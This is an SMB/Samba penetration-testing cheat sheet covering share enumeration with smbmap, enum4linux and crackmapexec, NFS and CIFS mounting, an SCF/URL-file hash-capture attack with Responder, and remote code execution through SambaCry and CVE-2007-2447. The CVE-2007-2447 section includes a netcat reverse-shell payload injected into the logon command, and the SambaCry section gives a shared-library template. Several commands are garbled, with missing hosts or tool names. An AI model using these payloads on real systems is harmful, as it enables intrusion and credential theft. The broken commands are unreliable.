Port : 445,139




#Protocol negotiation failed: NT_STATUS_CONNECTION_DISCONNECTED
#Add to 'global' section in /etc/samba/smb.conf
client min protocol = LANMAN1
  • Nmap Scripts

    • smb-os-discovery.nse [OS Detection]

    • smb-vuln [Checks for windows remote vuln]

    • smb-vuln-ms17-010 [Checks if SMBv1 server is vulnerable]

Enumerating Shares

enum4linux -a <IP>
python3 -u "username" -p "password" -q

#List Shares
smbmap -u "" -p "" -P 445 -H <DC IP> && smbmap -u "guest" -p "" -P 445 -H <DC IP>
smbmap -H <IP> -u username -p password

crackmapexec smb -u notarealuser -p '' --shares <IP>

#Deprecated protocols
smbclient -L \\\\\\ --option='client min protocol=NT1'

#Server requested LANMAN password (share-level security) but 'client lanman auth = no' or 'client ntlmv2 auth = yes'
#In the /etc/samba/smb.conf file to be able to connect to those old servers.
client lanman auth = yes
client ntlmv2 auth = no

#List contents of share
smbmap -R Share_name -H
smbclient \\\Sharename
#-k to use cached kerberos TGT
smbclient -k -L //<IP.local>

#Download shares [-q :Quiet mode]
smbmap -R Share_name -H -A Filename -q -u notarealusername
smbclient // -U ""%"" -c 'prompt OFF;recurse ON; mget *' 
get file.txt

#Logging into SMB Share [-N :suppresses password prompt]
smbclient \\\\\\Share_name -U "Username"%"Password"
smbclient -N \\\\\\Share_name

#impacket <Domain>/<Username>:<Password>@<IP-Address>
  • In case of Error:[!]Authentication error on<IP>.

smbmap -H -u notausername 
#Try this
pip3 install --upgrade impacket

Version Enumeration


sudo python -s <IP>

Manually Identify Version

  • Run wireshark and start sniffing

  • Run: smbclient -L <\\IP>

  • Stop sniffing and find packet:

  • protocol: SMB Info: Sessions Setup And Response

RestrictAnonymous Bypass

  • Username enumeration via SID walk

Mounting Shares

NFS (Network File System) is a popular distributed file system. NFS shares are configured in the /etc/exports file. Remote users can mount shares, access, create, modify files. By default, created files inherit the remote user’s id and group id (as owner and group respectively), even if they don’t exist on the NFS server.

#Check for mountable shares
showmount -e

#Lists current mounted directories
df -k

ls /mnt
mount -t cifs -o username=notarealname,password=<Empty-for-null-login> // /mnt/local_dir_name

#Mount NFS Shares
sudo mkdir /tmp/tmpdir
sudo mount -t nfs 
mount -t nfs [-o vers=2] <ip>:<remote_folder> /tmp/tmpdir -o nolock
sudo umount -a -t cifs

#Script for checking if share is writable
list=$(find /mnt -type d)
for d in $list
  touch $d/x 2>/dev/null
  if [ $? -eq 0 ]
    echo $d "is writable"

Mounting VHD Shares

//Mount the share
mount -t cifs -o 'rw,username=guest' // localdirectory_name
//Mount the vhd file within this share
guestmount -a /mnt/remote/path/to/vhdfile.vhd -m /dev/sda1 --ro /root/bastion
  • Tip: Look for SAM, Security System files in C:\Windows\System32\config

Write-Access Attack

SCF and URL file attack against writeable share

Drop the following @something.scf/something.scf file inside a share and start listening with Responder :

  • responder -wrf --lm -v -I eth0 (may not work all the time, try both commands)

  • responder -I tun0


This attack also works with .url files


Setting up a Samba Server

sudo -smb2support Data $(pwd)

chmod +x /path/toshare/

path = /path/to/share
writeable = yes
browseable = yes
public = yes

service smbd restart

net use k: \\\myshare

#To reset
net user k: /delete

#Create an NTFS disk.(2GB)
dd if=/dev/zero of=ntfs.disk bs=1024M count=2
losetup -h
sudo losetup -fP ntfs.disk
losetup -a
sudo mkfs.ntfs /dev/loop0
sudo mount /dev/loop0 /directory/to/mount
mount | grep /directory/to/mount

SambaCry CVE-2017-7494 [RCE]


  • Remote code execution from a writable share.

  • Versions affected: All versions of Samba from 3.5.0 onwards.

  • Description: Malicious clients can upload and cause the smbd server to execute a shared library from a writable share.

Samba 3.x after 3.5.0 and 4.x before 4.4.14, 4.5.x before 4.5.10, and 4.6.x before 4.6.4 does not restrict the file path when using Windows named pipes, which allows remote authenticated users to upload a shared library to a writable shared folder, and execute arbitrary code via a crafted named pipe.


  • Clone the Github Repo

#include <stdio.h>
#include <stdlib.h>

static void smash() __attribute__((constructor));
Samba 3.0.24

void smash() {
system("<put a bash command here>");

then compile with
gcc -o <> -shared <infile.c> -fPIC


  • Version : smbd 3.0.20-Debian [With Anonymous Login]

  • CVE-2007–2447

    • -logon : changing users once connected

#Set up listener on Attacker's System
smbclient //victim_IP/tmp --option='client min protocol=NT1'

logon "/=`nohup nc -nv 4444 -e /bin/sh`"

Samba < 2.2.8 (Linux/BSD) - Remote Code Execution

searchsploit -m 10
gcc exploit.c -o exploit
./exploit -b 0 -v <IP>

Last updated